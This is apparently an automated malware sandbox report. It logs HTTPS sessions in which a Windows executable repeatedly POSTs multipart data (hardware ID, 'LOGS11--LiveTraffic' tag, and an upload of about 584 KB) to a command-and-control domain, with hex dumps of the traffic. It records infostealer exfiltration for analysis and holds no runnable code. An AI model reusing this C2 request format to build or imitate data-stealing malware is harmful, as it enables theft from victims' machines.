    Date: Fri, 27 Dec 2024 07:41:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=rp86j2td3h01mdf3f39pflqv43; expires=Tue, 22 Apr 2025 01:28:33 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D8CjHqE73Hle2IiCt4t6lubEvv9Rpi2eG52eNToMOTn5OuDLFEhsHs3iLTLGa8dlP4ZSD6%2Bnh4%2BuztayyL%2FELFWDPX%2Bz5KlLhuOqHiKTrUq4J2abeDIp%2B5is4U6ZPtEf8sU%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f87abbc4fe1427c-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1798&rtt_var=686&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13797&delivery_rate=1624026&cwnd=246&unsent_bytes=0&cid=de7c7506d703dec8&ts=865&x=0"
2024-12-27 07:41:54 UTC | 20 | IN | f\r\nok 8.46.123.189\r\n
2024-12-27 07:41:54 UTC | 5 | IN | 0\r\n\r\n


Session ID: 3
Source IP: 192.168.2.9
Source Port: 49730
Destination IP: 172.67.165.185
Destination Port: 443
PID: 6492
Process: C:\Users\user\Desktop\zi042476Iv.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:41:56 UTC | 276 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=QDB45LVK03BQP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15039
    Host: mindhandru.buzz
2024-12-27 07:41:56 UTC | 15039 | OUT | multipart body (the report captures only the first bytes):
    --QDB45LVK03BQP
    Content-Disposition: form-data; name="hwid"

    9D4D2C402283055CBEBA0C6A975F1733
    --QDB45LVK03BQP
    Content-Disposition: form-data; name="pid"

    2
    --QDB45LVK03BQP
    Content-Disposition: form-data; name="lid"

    LOGS11--LiveTraffic
    --QDB45
2024-12-27 07:42:04 UTC | 1128 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 07:42:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=v32d772gmom7ughv0272168dg7; expires=Tue, 22 Apr 2025 01:28:42 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kN9%2FlPE1kvQXgPPfBHUbr3DGlgp48h8SSiEWTZaXtthxl7BOUtES2HdLG%2Fim%2FdU1Il7iIRyaXGXYsuytK8joBfKDHGVwdCi0QdX1FrQznTPZU9weCsaX5undf9Sf9XPhemE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f87abca68747c96-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1763&rtt_var=681&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15973&delivery_rate=1583514&cwnd=173&unsent_bytes=0&cid=e4c0cfbda29462ec&ts=8173&x=0"
2024-12-27 07:42:04 UTC | 20 | IN | f\r\nok 8.46.123.189\r\n
2024-12-27 07:42:04 UTC | 5 | IN | 0\r\n\r\n


Session ID: 4
Source IP: 192.168.2.9
Source Port: 49752
Destination IP: 172.67.165.185
Destination Port: 443
PID: 6492
Process: C:\Users\user\Desktop\zi042476Iv.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:42:05 UTC | 271 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=8IC5CEH6
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20525
    Host: mindhandru.buzz
2024-12-27 07:42:05 UTC | 15331 | OUT | multipart body (the report captures only the first bytes):
    --8IC5CEH6
    Content-Disposition: form-data; name="hwid"

    9D4D2C402283055CBEBA0C6A975F1733
    --8IC5CEH6
    Content-Disposition: form-data; name="pid"

    3
    --8IC5CEH6
    Content-Disposition: form-data; name="lid"

    LOGS11--LiveTraffic
    --8IC5CEH6
    Content-Di
                                                                                                                                  2024-12-27 07:42:05 UTC5194OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 fa a3 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: s}Q0u?4E([:s~X`nO
2024-12-27 07:42:06 UTC | 1140 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:42:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=jg2dktdrmqn3pqjcb3pmsa4mnv; expires=Tue, 22 Apr 2025 01:28:45 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mu%2BceBeLLAutbHch%2FUUEtkesRaBfK1yZI1x9d%2FTKu0v%2BVNXW1p4Eunqnp%2BVm1TjkaN9EmfOQ%2Fof4AZo86vmA7%2BjfambUeO5iYdfHY0KUidiK4FLZYTPpxpPeIs%2BY9R%2BuDgo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87ac0789ee8c84-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1788&rtt_var=682&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21476&delivery_rate=1590413&cwnd=175&unsent_bytes=0&cid=d70133de804dd0b7&ts=1004&x=0"
2024-12-27 07:42:06 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 07:42:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49758 | 172.67.165.185 | 443 | 6492 | C:\Users\user\Desktop\zi042476Iv.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:42:08 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=X5992ZCBKQN2H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1209
Host: mindhandru.buzz
                                                                                                                                  2024-12-27 07:42:08 UTC1209OUTData Raw: 2d 2d 58 35 39 39 32 5a 43 42 4b 51 4e 32 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 34 44 32 43 34 30 32 32 38 33 30 35 35 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 58 35 39 39 32 5a 43 42 4b 51 4e 32 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 35 39 39 32 5a 43 42 4b 51 4e 32 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 58 35 39 39 32
                                                                                                                                  Data Ascii: --X5992ZCBKQN2HContent-Disposition: form-data; name="hwid"9D4D2C402283055CBEBA0C6A975F1733--X5992ZCBKQN2HContent-Disposition: form-data; name="pid"1--X5992ZCBKQN2HContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--X5992
2024-12-27 07:42:09 UTC | 1130 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:42:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=12gc22ufgjphf0bkibjj9devbg; expires=Tue, 22 Apr 2025 01:28:47 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzXpdG%2B4jKXl5DGy26x6dqXbKNyCqQIutME7zFziEPn44qJ7jj0PXwZK0jWR59Gm%2F9kzIZHK%2Bl%2FcX3kxiiZSWqoyocpprs1Tw1aAgvlKYiLx4%2F6%2BxwsUQIVgi56nnyDOzOk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87ac17ceac7295-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1807&min_rtt=1802&rtt_var=687&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2120&delivery_rate=1579232&cwnd=206&unsent_bytes=0&cid=b66677c8d3cad38d&ts=754&x=0"
2024-12-27 07:42:09 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 07:42:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49763 | 104.21.11.101 | 443 | 6492 | C:\Users\user\Desktop\zi042476Iv.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:42:11 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=Q9LXEUVN8EZW59MC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 584458
Host: mindhandru.buzz
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: 2d 2d 51 39 4c 58 45 55 56 4e 38 45 5a 57 35 39 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 34 44 32 43 34 30 32 32 38 33 30 35 35 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 51 39 4c 58 45 55 56 4e 38 45 5a 57 35 39 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 39 4c 58 45 55 56 4e 38 45 5a 57 35 39 4d 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                  Data Ascii: --Q9LXEUVN8EZW59MCContent-Disposition: form-data; name="hwid"9D4D2C402283055CBEBA0C6A975F1733--Q9LXEUVN8EZW59MCContent-Disposition: form-data; name="pid"1--Q9LXEUVN8EZW59MCContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: aa f1 80 66 79 ac 1a ae 15 63 7a 1e ad 2a bd eb db 81 37 37 77 b5 27 b9 8d 20 2a ad 62 3b bb 7e 17 98 5a f3 fa df be a1 55 2d 2c ec 10 80 a3 6a 00 2a 37 ea 6e 05 11 30 5c 40 02 18 e1 5b 11 3d 10 89 a4 7d a1 cf 13 49 4c a5 b5 6d 07 2d 8c 84 ee dc 83 90 e3 04 f0 ac 9a 7e 03 b4 96 6e 4e 5d 56 05 9a f6 55 0d 04 31 a3 24 91 e9 1a 1e 26 15 c2 bc 58 cd 89 86 32 ff 28 8d 70 bb 5c 58 81 bc 52 eb e1 c5 41 a2 e6 e6 8a bf e6 53 03 c7 f9 06 d8 0d 33 a1 d6 0d 8f e3 da 8b b3 b1 b0 f6 a2 59 4e e1 de 84 b7 bb 69 ec f1 29 83 4a f1 c9 62 e9 15 5f 66 44 c6 6c 5d 6f 3c c7 e9 2e 57 2b 10 0c 42 85 c0 e5 d6 86 8c 9c 66 74 fb 73 b8 83 7b f8 20 78 e3 4c a4 cf 1a 04 cc fe d4 1d cc 9c a6 13 90 6e c2 7b bb d2 65 45 9a 65 e8 3c bd 4d f5 8e 0f 8f d2 72 12 18 4b 77 a5 7b a0 f6 01 ab 3f
                                                                                                                                  Data Ascii: fycz*77w' *b;~ZU-,j*7n0\@[=}ILm-~nN]VU1$&X2(p\XRAS3YNi)Jb_fDl]o<.W+Bfts{ xLn{eEe<MrKw{?
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: 8b 6f 4c e5 9b b3 cc eb 9a d2 2e bd 1a 63 dd 1c 04 c2 4a 07 29 86 98 d4 07 17 e2 31 2c 81 ce a7 3f 96 65 13 1e 55 eb ff 01 2e 8e f8 5b 75 16 af 5e 47 6f 3e 2b 21 42 1b 78 f6 be 8f 76 89 9c f8 01 29 eb a0 b0 80 a8 b5 0f df ef 1c 0e fc 2c bf f2 3d 80 86 de d7 5f aa 20 51 b8 15 bf 57 3a 0c be 37 22 dd 1b 62 99 19 38 c9 6b b1 f6 2e c8 ec ef 04 d1 7a 3f 6a 8f fc f9 dd 0d ec d1 6e 46 4f 33 43 c9 6d b4 6f 8e cb 6b 6b 99 51 36 99 5d d6 bc b5 29 5c e5 e1 d5 1b 10 7b a5 d8 fb e6 77 30 d7 9d 18 34 a2 f8 dc 27 5c c7 bd 5e 6b a6 78 28 86 8b 39 cb b1 3f 79 ba d2 27 66 7f 8d 85 f7 01 cf 8e 88 63 36 6b 86 d6 e5 fd f8 29 99 91 6e cc f0 5e c9 87 b3 bf 97 57 ae cf 4c 3b 36 67 56 57 8d 9e e1 3a cb ec 76 ac 10 3e 7b ef 4e 27 87 c2 c1 e7 6b 1b af ef c6 b1 66 c6 9c 47 74 0c a7
                                                                                                                                  Data Ascii: oL.cJ)1,?eU.[u^Go>+!Bxv),=_ QW:7"b8k.z?jnFO3CmokkQ6])\{w04'\^kx(9?y'fc6k)n^WL;6gVW:v>{N'kfGt
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: a6 b9 87 13 66 38 71 12 37 49 1f 41 92 b8 e4 33 21 52 78 c1 72 f4 7a ca ce d2 d3 97 9f 3d d8 a8 97 cf 8f c4 38 7c 57 0e ac 11 c4 eb f1 f0 e5 1a b5 9f 23 32 00 e8 a6 7c 22 30 a4 b1 13 a3 9e b4 41 2b f7 26 c6 76 de fc 92 40 87 7a 5b 47 7c 25 16 11 42 22 7d 6e 83 58 cb d5 cc bd 18 bc d0 a4 33 9b dc be f5 36 d8 68 d3 57 4a 49 af c0 23 b6 66 8d 51 f9 75 5c 46 df db bd 4a c5 62 65 f8 64 70 0d b3 d1 bd 49 4d fc 3d 02 4b 94 da f3 ec 90 08 19 e0 24 77 42 69 cf 5b 38 f1 6b f4 21 a7 35 21 aa 43 5b 11 9c 44 22 5a 59 cf 3a ea 6c 3d 38 7a 8a bd 08 12 c6 71 bf e4 2d 83 32 54 f6 93 7b 7a 23 0f 7e 30 cb 1d 4a 7e 4a 22 65 72 01 45 94 c4 13 50 28 29 a2 c1 d7 88 fd 72 d4 e3 63 93 08 70 45 c2 0f 37 eb e1 14 40 0e b6 b0 fb 6b 42 48 66 1a 87 98 12 90 d0 58 dd 89 bc cb 06 8a 55
                                                                                                                                  Data Ascii: f8q7IA3!Rxrz=8|W#2|"0A+&v@z[G|%B"}nX36hWJI#fQu\FJbedpIM=K$wBi[8k!5!C[D"ZY:l=8zq-2T{z#~0J~J"erEP()rcpE7@kBHfXU
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: 18 e9 04 01 de 26 58 4a e9 e6 98 a7 f9 c1 fb 84 d3 7e 66 03 87 09 4d 61 4f 00 36 24 ad 83 ee 30 80 1c 26 ba ae 15 03 4c fa bd 41 ff 78 6d 5e f8 dd f3 2a 1f 16 f5 42 f5 d0 09 05 0f 66 f9 8e b8 b1 5f 47 e5 b8 55 0b b1 41 27 2d c9 d9 4a fa 29 f4 6c 97 d7 af 43 3f 3a 5c 12 0f 62 5f c7 ac f4 b0 b2 cc 66 69 d6 b4 20 f8 7a 3a fc 83 34 7a 9d 0a 4f 8e bc 97 bd 46 43 6d 0a ac 96 bd 26 ca 4d 3a f0 a2 52 88 4a 6f 62 ca 82 fc f4 8e 5b c3 0d 9c d2 5f 05 77 42 50 cb 51 f2 78 6c 2f 2f 87 e3 de bd 5f b4 3d 79 3b 29 a8 b1 ef f0 1d 79 9b 35 e5 5a 29 27 86 20 04 df 01 99 1c c6 8b c3 0e c3 bf 81 84 42 93 14 bf 41 78 de 5c 72 4f f6 5e ef 4e f6 d3 9b 11 0f 69 af 4b bf 2e 87 9d 91 29 75 82 15 46 90 2e ba e3 21 01 42 cb bc 20 72 0a fe a9 94 e5 73 85 60 21 58 19 f1 74 e9 f7 26 7a
                                                                                                                                  Data Ascii: &XJ~fMaO6$0&LAxm^*Bf_GUA'-J)lC?:\b_fi z:4zOFCm&M:RJob[_wBPQxl//_=y;)y5Z)' BAx\rO^NiK.)uF.!B rs`!Xt&z
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: cb 3c c9 f8 11 48 a9 f8 08 8b b4 e0 ae 95 c6 92 59 96 c3 cb e6 ef cc 93 d0 78 54 98 16 2f 0e 97 a4 6c 2a 95 11 ae d7 c2 5a 7a e8 cb b0 62 c0 ea 3f cd 6e 04 34 25 1e dd 21 1c ab 49 49 92 67 e2 f9 4e 13 13 5b 7d b6 66 aa 17 fb 7a 8b e8 9c 32 d4 d4 1e c1 17 87 62 9d d1 91 6a b3 79 53 6e a2 c5 be 6c ef f3 4c cf 19 1a 00 b3 37 6f 0e b3 1f 78 bc 9f 73 b0 49 20 89 a8 5c 54 9d fc c1 5e 2f a6 3f 82 0d 11 a8 76 9a 69 4a 75 3a a7 57 dc 62 43 be d0 42 40 18 41 41 02 eb d0 72 5f 65 a8 da 2f d7 71 aa 14 26 c5 0a f5 7b f8 24 a7 56 14 25 f5 8b a0 1c 1d a3 c9 a2 78 f8 f0 20 f6 e7 8e 4c fe 78 3c b1 a9 21 d4 fd 5b 4c 14 25 74 31 c3 8b 45 4b f9 b8 0a 33 a0 95 85 a4 2e a3 dc 55 01 28 29 3b 31 d4 51 06 12 25 06 88 2e 8e 7c ee 2f 24 e5 a3 79 b5 9f a9 e2 cf 70 08 fb 2d f4 4b 2c
                                                                                                                                  Data Ascii: <HYxT/l*Zzb?n4%!IIgN[}fz2bjySnlL7oxsI \T^/?viJu:WbCB@AAr_e/q&{$V%x Lx<![L%t1EK3.U();1Q%.|/$yp-K,
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: 7a 8c 01 4e 11 fd 01 24 e1 b9 bc 99 ab b7 80 ed 41 ab f6 ea 2d c4 a3 d7 34 d3 38 42 e7 d8 d4 77 3d cf 28 f9 24 9c d9 68 a6 22 97 17 71 b9 3e 46 e5 42 0d 8a e2 b3 ab 99 7b 2c c9 d4 3e 2c e0 d6 d5 14 67 be 65 ee fd db f9 c9 2a 08 d5 df 79 c4 a4 29 be c3 77 f8 84 ae db 60 0e da fe af 86 69 2d 25 5a f9 0e ff f9 09 dc 9a 27 5d 9b 37 b3 4b 4c 65 68 d6 b0 ef ac 1c 5b cd 22 f4 79 e4 13 17 9b 24 af f3 18 52 d8 ea d5 df 2f 63 a1 79 b0 04 d6 7a 11 f9 38 53 fd 0c 45 74 56 87 69 0f a0 2f 8b a7 5b 60 1a 35 94 20 c9 4d cf 56 15 54 50 c1 01 49 5a 1b 95 20 4b b4 ca cd 77 04 14 a7 6f 1c fa 7a 12 9c d9 61 fd 9b 80 2f 67 5e 76 81 d2 05 98 3b fe a8 83 91 2f bd 48 13 db ad ba 86 69 fb 0c fa 8f 69 6a 68 f0 a5 7f 37 17 06 a6 5a e8 5f 46 98 f4 94 2f 54 79 f2 d2 88 d1 53 6a 85 12
                                                                                                                                  Data Ascii: zN$A-48Bw=($h"q>FB{,>,ge*y)w`i-%Z']7KLeh["y$R/cyz8SEtVi/[`5 MVTPIZ Kwoza/g^v;/Hiijh7Z_F/TySj
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: 1e fb 59 9e 17 28 a0 25 4b b0 7f f9 ee 11 18 d1 db 46 0b 14 18 21 3d bf 50 34 5b 05 09 f9 d6 51 41 21 30 e8 92 6d c1 53 31 9a 4b fe cb 3b a0 40 19 93 e4 cf bf 09 40 89 44 c3 87 ff fe 93 b7 3f 1f 5d c9 73 88 82 b0 5d 47 5b 75 b9 2f 55 b1 82 18 18 b7 ec 9d 37 55 a1 79 ce 50 be 03 aa 3b 26 3d d6 99 72 53 ad b6 dc 81 d2 23 9b 84 78 60 b0 85 de af af d9 18 c5 c3 71 30 2f 0b d2 4b 51 19 e7 70 8d 19 a2 c7 dd 97 28 19 86 38 58 dd 06 40 b4 52 ef d9 03 5b 39 ee ef 10 49 b0 3a 85 e5 bb 63 44 62 d3 43 e0 ac ae fd a4 83 fc 57 b7 63 46 33 41 47 9b f0 c5 44 74 9f 15 dd ee a7 92 67 66 43 4a 54 a0 18 e7 b6 63 81 8b 3a ae db 21 32 0a 32 64 b6 5b 52 ac 17 6a 49 d3 27 c0 49 b1 f5 9f 26 ff 22 7e a9 21 4f e7 e1 61 11 f5 e7 d4 94 76 9f c5 bb 9f 10 bf aa 74 7c b9 c9 a3 0e 5f 81
                                                                                                                                  Data Ascii: Y(%KF!=P4[QA!0mS1K;@@D?]s]G[u/U7UyP;&=rS#x`q0/KQp(8X@R[9I:cDbCWcF3AGDtgfCJTc:!22d[RjI'I&"~!Oavt|_
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: f2 04 af 0f 31 4e 30 67 90 e7 d6 50 11 52 22 77 d4 48 49 62 32 d6 f8 a3 3b 3c 61 95 5b bf 12 93 09 af bb 88 1d c7 5f 77 87 c7 c7 9b 26 23 56 61 e0 0e 3f 86 92 d6 26 d4 60 12 b7 3e 60 8e 85 13 e2 58 e2 60 dc e5 3a c3 d1 fa b7 92 1f 4b 0c 19 70 8f 73 0e 09 95 0a eb 37 84 8c 11 2d 6e e8 e6 79 20 48 8f 84 97 46 22 a0 81 75 eb 17 ca 53 e0 9a 70 6f 17 a3 42 3d b9 9e df 9e 87 1a f9 39 3c 71 e7 a2 36 99 b3 06 f3 77 8d 88 14 6b 38 50 a0 96 9e d9 65 a3 a2 9c 12 ce 33 21 f4 89 22 01 ec 47 84 ad f5 71 3f 3e dc 75 aa 3b e2 96 9a 36 a0 9f 0e cd 87 2f 61 7e c9 f0 df aa cc 97 8a c4 6e de ee ca 5f 2c f2 aa d9 34 9e 02 dd 69 1f bf b5 83 f9 bd 29 b0 ad ef 69 d1 aa 89 e9 be 26 ce 69 4c 7b 1f d6 40 82 d3 82 f5 63 c7 b7 ca 48 f2 90 bc d9 55 f7 e5 68 a3 84 47 71 35 03 8b af 9e
                                                                                                                                  Data Ascii: 1N0gPR"wHIb2;<a[_w&#Va?&`>`X`:Kps7-ny HF"uSpoB=9<q6wk8Pe3!"Gq?>u;6/a~n_,4i)i&iL{@cHUhGq5
                                                                                                                                  2024-12-27 07:42:11 UTC15331OUTData Raw: 7d f5 ae 1d 4c 49 4a ea 8a 8a 2e 3c db 2d f9 9f 3d 9c a3 65 53 a5 a4 40 17 90 e1 c7 7c 32 2a 7a a7 a3 67 3b 6d 52 84 61 ea 6e c9 6d c4 6e da 48 9b 26 a5 1c 25 bf 26 0f 16 a2 60 9a 7f 4d 7f b3 d1 06 29 35 84 a3 d2 5c be 7a 62 cc 69 f3 20 c4 8b b3 a9 9b ff 61 22 35 69 4d 1a e5 73 d3 33 b2 c0 89 3a e7 38 fb 4e ea 61 91 3f 2b 9d 79 66 70 f1 d0 e7 cb 6b 27 ae f7 97 3b fb 4c cd 1d e8 79 e7 ec 1d 1f b2 c9 d1 2c d5 55 d4 6b 2e ff cb b4 eb ab 8b ad 98 dc cf 59 41 7d 9e f8 91 17 1c d6 ef b9 d6 af db d7 f9 60 47 70 da f4 40 e8 ef 53 79 6d 7d e7 ad d3 66 07 c2 d7 7b 67 67 dc 2a 86 07 82 47 4b 67 d3 dc 5a 7c 68 2b d6 2d 56 3b bb 06 ed a3 bb e7 7a bd 2a db 44 c1 f5 19 24 a8 e0 ac 4f 5d 9f e9 f9 34 7b 73 c7 53 aa af a4 c6 14 8f 92 4d c9 44 9c e6 51 4e e6 e0 45 32 19 c1
                                                                                                                                  Data Ascii: }LIJ.<-=eS@|2*zg;mRanmnH&%&`M)5\zbi a"5iMs3:8Na?+yfpk';Ly,Uk.YA}`Gp@Sym}f{gg*GKgZ|h+-V;z*D$O]4{sSMDQNE2
2024-12-27 07:42:14 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:42:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=40t7at7pib1made6nsiac9thhe; expires=Tue, 22 Apr 2025 01:28:52 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XSv2aIv8fgUvdNYUW0Ysbu3rjs%2B%2FAo3vpdM8x%2FnbHCF6owmNLC3zh97vFpc0VUV%2F8D3w1KoYeeU02AfCwt9LjccFjGUc3eRCTOqoeKF06qZdrRi%2BJKm2OeGQ8FBDdR8COSo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87ac2848ec42e7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1982&rtt_var=754&sent=331&recv=614&lost=0&retrans=0&sent_bytes=2836&recv_bytes=587046&delivery_rate=1441975&cwnd=241&unsent_bytes=0&cid=c6fc61e221ed1848&ts=3832&x=0"


                                                                                                                                  Target ID:0
                                                                                                                                  Start time:02:41:45
                                                                                                                                  Start date:27/12/2024
                                                                                                                                  Path:C:\Users\user\Desktop\zi042476Iv.exe
